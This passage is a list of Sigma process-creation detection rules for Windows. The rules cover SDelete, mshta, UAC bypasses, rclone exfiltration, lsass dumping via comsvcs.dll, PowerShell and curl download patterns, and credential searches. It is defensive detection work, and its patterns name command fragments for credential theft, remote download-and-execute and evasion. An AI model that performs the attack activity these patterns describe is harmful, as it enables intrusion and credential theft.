- source: sigma
- technicques:
- t1485
Description
Detects the use of SDelete to erase a file not the free space
Detection logic
condition: selection and not filter
filter:
CommandLine|contains:
- ' -h'
- ' -c'
- ' -z'
- ' /\?'
selection:
OriginalFileName: sdelete.exe
Suspicious Mshta.EXE Execution Patterns
- source: sigma
- technicques:
- t1106
Description
Detects suspicious mshta process execution patterns
Detection logic
condition: all of selection_* or (selection_img and not filter_img)
filter_img:
- Image|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
- CommandLine|contains:
- .htm
- .hta
- CommandLine|endswith:
- mshta.exe
- mshta
selection_img:
- Image|endswith: \mshta.exe
- OriginalFileName: MSHTA.EXE
selection_susp:
CommandLine|contains:
- \AppData\Local\
- C:\ProgramData\
- C:\Users\Public\
- C:\Windows\Temp\
ParentImage|endswith:
- \cmd.exe
- \cscript.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
Potential Product Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects the execution of WMIC in order to get a list of firewall and antivirus products
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: Product
selection_img:
- Image|endswith: \wmic.exe
- OriginalFileName: wmic.exe
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
- source: sigma
- technicques:
- t1518
- t1518.001
Description
Detects usage of “findstr” with the argument “385201”. Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' 385201'
selection_img:
- Image|endswith:
- \find.exe
- \findstr.exe
- OriginalFileName:
- FIND.EXE
- FINDSTR.EXE
Using SettingSyncHost.exe as LOLBin
- source: sigma
- technicques:
- t1574
- t1574.008
Description
Detects using SettingSyncHost.exe to run hijacked binary
Detection logic
condition: not system_utility and parent_is_settingsynchost
parent_is_settingsynchost:
ParentCommandLine|contains|all:
- cmd.exe /c
- RoamDiag.cmd
- -outputpath
system_utility:
Image|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
UAC Bypass Using ChangePK and SLUI
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
Detection logic
condition: selection
selection:
Image|endswith: \changepk.exe
IntegrityLevel:
- High
- System
ParentImage|endswith: \slui.exe
Obfuscated IP Download Activity
- source: sigma
- technicques:
Description
Detects use of an encoded/obfuscated version of an IP address (hex, octal…) in an URL combined with a download command
Detection logic
condition: selection_command and 1 of selection_ip_* and not 1 of filter_main_*
filter_main_valid_ip:
CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4}
selection_command:
CommandLine|contains:
- Invoke-WebRequest
- 'iwr '
- 'wget '
- 'curl '
- DownloadFile
- DownloadString
selection_ip_1:
CommandLine|contains:
- ' 0x'
- //0x
- .0x
- .00x
selection_ip_2:
CommandLine|contains|all:
- http://%
- '%2e'
selection_ip_3:
- CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4}
- CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7}
- CommandLine|re: https?://0[0-9]{3,11}
- CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11}
- CommandLine|re: https?://0[0-9]{1,11}
- CommandLine|re: ' [0-7]{7,13}'
Suspicious Execution of InstallUtil Without Log
- source: sigma
- technicques:
Description
Uses the .NET InstallUtil.exe application in order to execute image without log
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- '/logfile= '
- /LogToConsole=false
Image|contains: Microsoft.NET\Framework
Image|endswith: \InstallUtil.exe
Suspicious Registry Modification From ADS Via Regini.EXE
- source: sigma
- technicques:
- t1112
Description
Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
Detection logic
condition: all of selection_*
selection_img:
- Image|endswith: \regini.exe
- OriginalFileName: REGINI.EXE
selection_re:
CommandLine|re: :[^ \\]
Webshell Detection With Command Line Keywords
- source: sigma
- technicques:
- t1018
- t1033
- t1087
- t1505
- t1505.003
Description
Detects certain command line parameters often used during reconnaissance activity via web shells
Detection logic
condition: 1 of selection_webserver_* and 1 of selection_susp_*
selection_susp_change_dir:
CommandLine|contains:
- '&cd&echo'
- 'cd /d '
selection_susp_misc_discovery_binaries:
- Image|endswith:
- \dsquery.exe
- \find.exe
- \findstr.exe
- \ipconfig.exe
- \netstat.exe
- \nslookup.exe
- \pathping.exe
- \quser.exe
- \schtasks.exe
- \systeminfo.exe
- \tasklist.exe
- \tracert.exe
- \ver.exe
- \wevtutil.exe
- \whoami.exe
- OriginalFileName:
- dsquery.exe
- find.exe
- findstr.exe
- ipconfig.exe
- netstat.exe
- nslookup.exe
- pathping.exe
- quser.exe
- schtasks.exe
- sysinfo.exe
- tasklist.exe
- tracert.exe
- ver.exe
- VSSADMIN.EXE
- wevtutil.exe
- whoami.exe
selection_susp_misc_discovery_commands:
CommandLine|contains:
- ' Test-NetConnection '
- dir \
selection_susp_net_utility:
CommandLine|contains:
- ' user '
- ' use '
- ' group '
OriginalFileName:
- net.exe
- net1.exe
selection_susp_ping_utility:
CommandLine|contains: ' -n '
OriginalFileName: ping.exe
selection_susp_wmic_utility:
CommandLine|contains: ' /node:'
OriginalFileName: wmic.exe
selection_webserver_characteristics_tomcat1:
ParentImage|contains:
- -tomcat-
- \tomcat
ParentImage|endswith:
- \java.exe
- \javaw.exe
selection_webserver_characteristics_tomcat2:
CommandLine|contains:
- catalina.jar
- CATALINA_HOME
ParentImage|endswith:
- \java.exe
- \javaw.exe
selection_webserver_image:
ParentImage|endswith:
- \w3wp.exe
- \php-cgi.exe
- \nginx.exe
- \httpd.exe
- \caddy.exe
- \ws_tomcatservice.exe
File Download with Headless Browser
- source: sigma
- technicques:
- t1105
Description
Detects execution of chromium based browser in headless mode using the “dump-dom” command line to download files
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- --headless
- dump-dom
- http
Image|endswith:
- \brave.exe
- \chrome.exe
- \msedge.exe
- \opera.exe
- \vivaldi.exe
Potential Shim Database Persistence via Sdbinst.EXE
- source: sigma
- technicques:
- t1546
- t1546.011
Description
Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Detection logic
condition: all of selection_* and not 1 of filter_optional_*
filter_optional_iis:
CommandLine|contains:
- :\Program Files (x86)\IIS Express\iisexpressshim.sdb
- :\Program Files\IIS Express\iisexpressshim.sdb
ParentImage|endswith: \msiexec.exe
selection_cli:
CommandLine|contains: .sdb
selection_img:
- Image|endswith: \sdbinst.exe
- OriginalFileName: sdbinst.exe
Read Contents From Stdin Via Cmd.EXE
- source: sigma
- technicques:
- t1059
- t1059.003
Description
Detect the use of “<” to read and potentially execute a file via cmd.exe
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: <
selection_cmd:
- OriginalFileName: Cmd.Exe
- Image|endswith: \cmd.exe
Renamed AdFind Execution
- source: sigma
- technicques:
- t1018
- t1069
- t1069.002
- t1087
- t1087.002
- t1482
Description
Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.
Detection logic
condition: 1 of selection* and not filter
filter:
Image|endswith: \AdFind.exe
selection_1:
CommandLine|contains:
- domainlist
- trustdmp
- dcmodes
- adinfo
- ' dclist '
- computer_pwdnotreqd
- objectcategory=
- -subnets -f
- name="Domain Admins"
- '-sc u:'
- domainncs
- dompol
- ' oudmp '
- subnetdmp
- gpodmp
- fspdmp
- users_noexpire
- computers_active
- computers_pwdnotreqd
selection_2:
- Imphash:
- bca5675746d13a1f246e2da3c2217492
- 53e117a96057eaf19c41380d0e87f1c2
- Hashes|contains:
- IMPHASH=BCA5675746D13A1F246E2DA3C2217492
- IMPHASH=53E117A96057EAF19C41380D0E87F1C2
selection_3:
OriginalFileName: AdFind.exe
PUA - Rclone Execution
- source: sigma
- technicques:
- t1567
- t1567.002
Description
Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
Detection logic
condition: selection_specific_options or all of selection_rclone_*
selection_rclone_cli:
CommandLine|contains:
- pass
- user
- copy
- sync
- config
- lsd
- remote
- ls
- mega
- pcloud
- ftp
- ignore-existing
- auto-confirm
- transfers
- multi-thread-streams
- 'no-check-certificate '
selection_rclone_img:
- Image|endswith: \rclone.exe
- Description: Rsync for cloud storage
selection_specific_options:
CommandLine|contains|all:
- '--config '
- '--no-check-certificate '
- ' copy '
DumpStack.log Defender Evasion
- source: sigma
- technicques:
Description
Detects the use of the filename DumpStack.log to evade Microsoft Defender
Detection logic
condition: 1 of selection*
selection:
Image|endswith: \DumpStack.log
selection_download:
CommandLine|contains: ' -o DumpStack.log'
Potential Persistence Via Powershell Search Order Hijacking - Task
- source: sigma
- technicques:
- t1053
- t1053.005
- t1059
- t1059.001
Description
Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell “Get-Variable” technique as seen being used in Colibri Loader
Detection logic
condition: selection
selection:
CommandLine|endswith:
- ' -windowstyle hidden'
- ' -w hidden'
- ' -ep bypass'
- ' -noni'
ParentCommandLine|contains|all:
- -k netsvcs
- -s Schedule
ParentImage: C:\WINDOWS\System32\svchost.exe
Run Once Task Execution as Configured in Registry
- source: sigma
- technicques:
- t1112
Description
This rule detects the execution of Run Once task as configured in the registry
Detection logic
condition: all of selection_*
selection_cli:
- CommandLine|contains: /AlternateShellStartup
- CommandLine|endswith: /r
selection_img:
- Image|endswith: \runonce.exe
- Description: Run Once Wrapper
C# IL Code Compilation Via Ilasm.EXE
- source: sigma
- technicques:
- t1127
Description
Detects the use of “Ilasm.EXE” in order to compile C# intermediate (IL) code to EXE or DLL.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ' /dll'
- ' /exe'
selection_img:
- Image|endswith: \ilasm.exe
- OriginalFileName: ilasm.exe
Windows Credential Manager Access via VaultCmd
- source: sigma
- technicques:
- t1555
- t1555.004
Description
List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
Detection logic
condition: all of selection*
selection_cli:
CommandLine|contains: '/listcreds:'
selection_img:
- Image|endswith: \VaultCmd.exe
- OriginalFileName: VAULTCMD.EXE
Unusual Parent Process For Cmd.EXE
- source: sigma
- technicques:
- t1059
Description
Detects suspicious parent process for cmd.exe
Detection logic
condition: selection
selection:
Image|endswith: \cmd.exe
ParentImage|endswith:
- \csrss.exe
- \ctfmon.exe
- \dllhost.exe
- \epad.exe
- \FlashPlayerUpdateService.exe
- \GoogleUpdate.exe
- \jucheck.exe
- \jusched.exe
- \LogonUI.exe
- \lsass.exe
- \regsvr32.exe
- \SearchIndexer.exe
- \SearchProtocolHost.exe
- \SIHClient.exe
- \sihost.exe
- \slui.exe
- \spoolsv.exe
- \sppsvc.exe
- \taskhostw.exe
- \unsecapp.exe
- \WerFault.exe
- \wermgr.exe
- \wlanext.exe
- \WUDFHost.exe
Format.com FileSystem LOLBIN
- source: sigma
- technicques:
Description
Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs
Detection logic
condition: selection and not 1 of filter*
filter:
CommandLine|contains:
- /fs:FAT
- /fs:exFAT
- /fs:NTFS
- /fs:UDF
- /fs:ReFS
selection:
CommandLine|contains: '/fs:'
Image|endswith: \format.com
Suspicious File Characteristics Due to Missing Fields
- source: sigma
- technicques:
- t1059
- t1059.006
Description
Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
Detection logic
condition: (selection1 or selection2 or selection3) and folder
folder:
Image|contains: \Downloads\
selection1:
Description: \?
FileVersion: \?
selection2:
Description: \?
Product: \?
selection3:
Company: \?
Description: \?
UAC Bypass Using Consent and Comctl32 - Process
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
Detection logic
condition: selection
selection:
Image|endswith: \werfault.exe
IntegrityLevel:
- High
- System
ParentImage|endswith: \consent.exe
Dropping Of Password Filter DLL
- source: sigma
- technicques:
- t1556
- t1556.002
Description
Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
Detection logic
condition: selection_cmdline
selection_cmdline:
CommandLine|contains|all:
- HKLM\SYSTEM\CurrentControlSet\Control\Lsa
- scecli\0*
- reg add
Suspicious Chromium Browser Instance Executed With Custom Extension
- source: sigma
- technicques:
- t1176
Description
Detects a suspicious process spawning a Chromium based browser process with the ’load-extension’ flag to start an instance with a custom extension
Detection logic
condition: selection
selection:
CommandLine|contains: --load-extension=
Image|endswith:
- \brave.exe
- \chrome.exe
- \msedge.exe
- \opera.exe
- \vivaldi.exe
ParentImage|endswith:
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
PUA - Radmin Viewer Utility Execution
- source: sigma
- technicques:
- t1072
Description
Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
Detection logic
condition: selection
selection:
- Description: Radmin Viewer
- Product: Radmin Viewer
- OriginalFileName: Radmin.exe
Verclsid.exe Runs COM Object
- source: sigma
- technicques:
- t1218
Description
Detects when verclsid.exe is used to run COM object via GUID
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- /S
- /C
selection_img:
- Image|endswith: \verclsid.exe
- OriginalFileName: verclsid.exe
Gpresult Display Group Policy Information
- source: sigma
- technicques:
- t1615
Description
Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
Detection logic
condition: selection
selection:
CommandLine|contains:
- /z
- /v
Image|endswith: \gpresult.exe
Suspicious Where Execution
- source: sigma
- technicques:
- t1217
Description
Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Detection logic
condition: all of where_*
where_exe:
- Image|endswith: \where.exe
- OriginalFileName: where.exe
where_opt:
CommandLine|contains:
- places.sqlite
- cookies.sqlite
- formhistory.sqlite
- logins.json
- key4.db
- key3.db
- sessionstore.jsonlz4
- History
- Bookmarks
- Cookies
- Login Data
Directory Removal Via Rmdir
- source: sigma
- technicques:
- t1070
- t1070.004
Description
Detects execution of the builtin “rmdir” command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.
Detection logic
condition: all of selection_*
selection_flags:
CommandLine|contains:
- /s
- /q
selection_img:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe
selection_rmdir:
CommandLine|contains: rmdir
Interesting Service Enumeration Via Sc.EXE
- source: sigma
- technicques:
- t1003
Description
Detects the enumeration and query of interesting and in some cases sensitive services on the system via “sc.exe”. Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: query
selection_cmd:
CommandLine|contains: termservice
selection_img:
- Image|endswith: \sc.exe
- OriginalFileName: sc.exe
Potential Fake Instance Of Hxtsr.EXE Executed
- source: sigma
- technicques:
- t1036
Description
HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden “WindowsApps” subfolder of “C:\Program Files”. Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_hxtsr:
Image|contains: :\program files\windowsapps\microsoft.windowscommunicationsapps_
Image|endswith: \hxtsr.exe
selection:
Image|endswith: \hxtsr.exe
Suspicious Double Extension File Execution
- source: sigma
- technicques:
- t1566
- t1566.001
Description
Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
Detection logic
condition: selection
selection:
CommandLine|contains:
- .doc.exe
- .docx.exe
- .xls.exe
- .xlsx.exe
- .ppt.exe
- .pptx.exe
- .rtf.exe
- .pdf.exe
- .txt.exe
- ' .exe'
- ______.exe
- .doc.js
- .docx.js
- .xls.js
- .xlsx.js
- .ppt.js
- .pptx.js
- .rtf.js
- .pdf.js
- .txt.js
Image|endswith:
- .doc.exe
- .docx.exe
- .xls.exe
- .xlsx.exe
- .ppt.exe
- .pptx.exe
- .rtf.exe
- .pdf.exe
- .txt.exe
- ' .exe'
- ______.exe
- .doc.js
- .docx.js
- .xls.js
- .xlsx.js
- .ppt.js
- .pptx.js
- .rtf.js
- .pdf.js
- .txt.js
HackTool - SharpEvtMute Execution
- source: sigma
- technicques:
- t1562
- t1562.002
Description
Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
Detection logic
condition: selection
selection:
- Image|endswith: \SharpEvtMute.exe
- Description: SharpEvtMute
- CommandLine|contains:
- '--Filter "rule '
- --Encoded --Filter \"
Powershell Token Obfuscation - Process Creation
- source: sigma
- technicques:
- t1027
- t1027.009
Description
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
Detection logic
condition: selection
selection:
- CommandLine|re: \w+`(\w+|-|.)`[\w+|\s]
- CommandLine|re: '"(\{\d\})+"\s*-f'
- CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\}
Suspicious AgentExecutor PowerShell Execution
- source: sigma
- technicques:
- t1218
Description
Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy “Bypass” or any binary named “powershell.exe” located in the path provided by 6th positional argument
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_pwsh:
CommandLine|contains:
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
- C:\Windows\System32\WindowsPowerShell\v1.0\
selection_cli:
CommandLine|contains:
- ' -powershell'
- ' -remediationScript'
selection_img:
- Image|endswith: \AgentExecutor.exe
- OriginalFileName: AgentExecutor.exe
Suspicious JavaScript Execution Via Mshta.EXE
- source: sigma
- technicques:
- t1218
- t1218.005
Description
Detects execution of javascript code using “mshta.exe”.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: javascript
selection_img:
- Image|endswith: \mshta.exe
- OriginalFileName: MSHTA.EXE
Logged-On User Password Change Via Ksetup.EXE
- source: sigma
- technicques:
Description
Detects password change for the logged-on user’s via “ksetup.exe”
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' /ChangePassword '
selection_img:
- Image|endswith: \ksetup.exe
- OriginalFileName: ksetup.exe
Curl Download And Execute Combination
- source: sigma
- technicques:
- t1105
- t1218
Description
Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- 'curl '
- http
- -o
- '&'
CommandLine|contains|windash: ' -c '
Potentially Suspicious Regsvr32 HTTP/FTP Pattern
- source: sigma
- technicques:
- t1218
- t1218.010
Description
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
Detection logic
condition: all of selection_*
selection_flag:
CommandLine|contains:
- ' /i'
- ' -i'
selection_img:
- Image|endswith: \regsvr32.exe
- OriginalFileName: REGSVR32.EXE
selection_protocol:
CommandLine|contains:
- ftp
- http
Invoke-Obfuscation Via Use Clip
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detection logic
condition: selection
selection:
CommandLine|re: (?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)
Suspicious Windows Update Agent Empty Cmdline
- source: sigma
- technicques:
- t1036
Description
Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn’t contain any command line flags
Detection logic
condition: all of selection*
selection_cli:
CommandLine|endswith:
- Wuauclt
- Wuauclt.exe
selection_img:
- Image|endswith: \Wuauclt.exe
- OriginalFileName: Wuauclt.exe
PowerShell Download Pattern
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects a Powershell process that contains download commands in its command line string
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- string(
- file(
CommandLine|contains|all:
- new-object
- net.webclient).
- download
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
Potential MSTSC Shadowing Activity
- source: sigma
- technicques:
- t1563
- t1563.002
Description
Detects RDP session hijacking by using MSTSC shadowing
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- noconsentprompt
- 'shadow:'
HackTool - CrackMapExec Process Patterns
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects suspicious process patterns found in logs when CrackMapExec is used
Detection logic
condition: 1 of selection*
selection_lsass_dump1:
CommandLine|contains:
- 'cmd.exe /c '
- 'cmd.exe /r '
- 'cmd.exe /k '
- 'cmd /c '
- 'cmd /r '
- 'cmd /k '
CommandLine|contains|all:
- 'tasklist /fi '
- Imagename eq lsass.exe
User|contains:
- AUTHORI
- AUTORI
selection_lsass_dump2:
CommandLine|contains|all:
- do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump
- \Windows\Temp\
- ' full'
- '%%B'
selection_procdump:
CommandLine|contains|all:
- tasklist /v /fo csv
- findstr /i "lsass"
UAC Bypass Using NTFS Reparse Point - Process
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
Detection logic
condition: 1 of selection*
selection1:
CommandLine|endswith: \AppData\Local\Temp\update.msu
CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\'
IntegrityLevel:
- High
- System
selection2:
CommandLine|contains|all:
- C:\Users\
- \AppData\Local\Temp\
- \dismhost.exe {
Image|endswith: \DismHost.exe
IntegrityLevel:
- High
- System
ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package
/packagepath:"C:\Windows\system32\pe386" /ignorecheck'
Arbitrary Shell Command Execution Via Settingcontent-Ms
- source: sigma
- technicques:
- t1204
- t1566
- t1566.001
Description
The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Detection logic
condition: selection and not filter
filter:
CommandLine|contains: immersivecontrolpanel
selection:
CommandLine|contains: .SettingContent-ms
Enable LM Hash Storage - ProcCreation
- source: sigma
- technicques:
- t1112
Description
Detects changes to the “NoLMHash” registry value in order to allow Windows to store LM Hashes. By setting this registry value to “0” (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- \System\CurrentControlSet\Control\Lsa
- NoLMHash
- ' 0'
Findstr Launching .lnk File
- source: sigma
- technicques:
- t1027
- t1027.003
- t1036
- t1202
Description
Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|endswith:
- .lnk
- .lnk"
- .lnk'
selection_img:
- Image|endswith:
- \find.exe
- \findstr.exe
- OriginalFileName:
- FIND.EXE
- FINDSTR.EXE
Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution
- source: sigma
- technicques:
- t1218
Description
Detects execution of Windows Defender “OfflineScannerShell.exe” from its non standard directory. The “OfflineScannerShell.exe” binary is vulnerable to DLL side loading and will load any DLL named “mpclient.dll” from the current working directory.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_empty:
CurrentDirectory: ''
filter_main_legit_dir:
CurrentDirectory: C:\Program Files\Windows Defender\Offline\
filter_main_null:
CurrentDirectory: null
selection:
- Image|endswith: \OfflineScannerShell.exe
- OriginalFileName: OfflineScannerShell.exe
Suspicious Execution of Shutdown
- source: sigma
- technicques:
- t1529
Description
Use of the commandline to shutdown or reboot windows
Detection logic
condition: selection
selection:
CommandLine|contains:
- '/r '
- '/s '
Image|endswith: \shutdown.exe
Wab/Wabmig Unusual Parent Or Child Processes
- source: sigma
- technicques:
Description
Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
Detection logic
condition: 1 of selection_*
selection_child:
ParentImage|endswith:
- \wab.exe
- \wabmig.exe
selection_parent:
Image|endswith:
- \wab.exe
- \wabmig.exe
ParentImage|endswith:
- \WmiPrvSE.exe
- \svchost.exe
- \dllhost.exe
Password Provided In Command Line Of Net.EXE
- source: sigma
- technicques:
- t1021
- t1021.002
- t1078
Description
Detects a when net.exe is called with a password in the command line
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_empty:
CommandLine|endswith: ' '
selection_cli:
CommandLine|contains|all:
- ' use '
- :*\\
- /USER:* *
selection_img:
- Image|endswith:
- \net.exe
- \net1.exe
- OriginalFileName:
- net.exe
- net1.exe
VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
- source: sigma
- technicques:
- t1005
Description
Detects dump of credentials in VeeamBackup dbo
Detection logic
condition: all of selection_*
selection_query:
CommandLine|contains|all:
- SELECT
- TOP
- '[VeeamBackup].[dbo].[Credentials]'
selection_tools:
Image|endswith: \sqlcmd.exe
Potential CobaltStrike Process Patterns
- source: sigma
- technicques:
- t1059
Description
Detects potential process patterns related to Cobalt Strike beacon activity
Detection logic
condition: 1 of selection_*
selection_conhost_1:
CommandLine|endswith: conhost.exe 0xffffffff -ForceV1
ParentCommandLine|contains|all:
- cmd.exe /C echo
- ' > \\\\.\\pipe'
selection_conhost_2:
CommandLine|endswith: conhost.exe 0xffffffff -ForceV1
ParentCommandLine|endswith: /C whoami
selection_generic_1:
CommandLine|endswith: cmd.exe /C whoami
ParentImage|startswith: C:\Temp\
selection_generic_2:
CommandLine|contains|all:
- cmd.exe /c echo
- '> \\\\.\\pipe'
ParentImage|endswith:
- \runonce.exe
- \dllhost.exe
Greedy File Deletion Using Del
- source: sigma
- technicques:
- t1070
- t1070.004
Description
Detects execution of the “del” builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
Detection logic
condition: all of selection_*
selection_del:
CommandLine|contains:
- 'del '
- 'erase '
selection_extensions:
CommandLine|contains:
- \\\*.au3
- \\\*.dll
- \\\*.exe
- \\\*.js
selection_img:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe
Potentially Suspicious Event Viewer Child Process
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects uncommon or suspicious child processes of “eventvwr.exe” which might indicate a UAC bypass attempt
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_generic:
Image|endswith:
- :\Windows\System32\mmc.exe
- :\Windows\System32\WerFault.exe
- :\Windows\SysWOW64\WerFault.exe
selection:
ParentImage|endswith: \eventvwr.exe
LOL-Binary Copied From System Directory
- source: sigma
- technicques:
- t1036
- t1036.003
Description
Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
Detection logic
condition: 1 of selection_tools_* and all of selection_target_*
selection_target_lolbin:
CommandLine|contains:
- \bitsadmin.exe
- \calc.exe
- \certutil.exe
- \cmdl32.exe
- \cscript.exe
- \mshta.exe
- \rundll32.exe
- \wscript.exe
selection_target_path:
CommandLine|contains:
- \System32
- \SysWOW64
- \WinSxS
selection_tools_cmd:
CommandLine|contains: 'copy '
Image|endswith: \cmd.exe
selection_tools_other:
- Image|endswith:
- \robocopy.exe
- \xcopy.exe
- OriginalFileName:
- robocopy.exe
- XCOPY.EXE
selection_tools_pwsh:
CommandLine|contains:
- copy-item
- ' copy '
- 'cpi '
- ' cp '
Image|endswith:
- \powershell.exe
- \pwsh.exe
Findstr GPP Passwords
- source: sigma
- technicques:
- t1552
- t1552.006
Description
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- cpassword
- \sysvol\
- .xml
selection_img:
- Image|endswith:
- \find.exe
- \findstr.exe
- OriginalFileName:
- FIND.EXE
- FINDSTR.EXE
Process Memory Dump via RdrLeakDiag.EXE
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects the use of the Microsoft Windows Resource Leak Diagnostic tool “rdrleakdiag.exe” to dump process memory
Detection logic
condition: all of selection_cli_* or (selection_img and selection_cli_dump)
selection_cli_dump:
CommandLine|contains:
- fullmemdmp
- /memdmp
- -memdmp
selection_cli_output:
CommandLine|contains:
- ' -o '
- ' /o '
selection_cli_process:
CommandLine|contains:
- ' -p '
- ' /p '
selection_img:
- Image|endswith: \rdrleakdiag.exe
- OriginalFileName: RdrLeakDiag.exe
Suspicious Remote Child Process From Outlook
- source: sigma
- technicques:
- t1059
- t1202
Description
Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
Detection logic
condition: selection
selection:
Image|startswith: \\\\
ParentImage|endswith: \outlook.exe
Potential Commandline Obfuscation Using Unicode Characters
- source: sigma
- technicques:
- t1027
Description
Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Detection logic
condition: 1 of selection_*
selection_other:
CommandLine|contains:
- "\xE2"
- "\u20AC"
- "\xA3"
- "\xAF"
- "\xAE"
- "\xB5"
- "\xB6"
selection_spacing_modifiers:
CommandLine|contains:
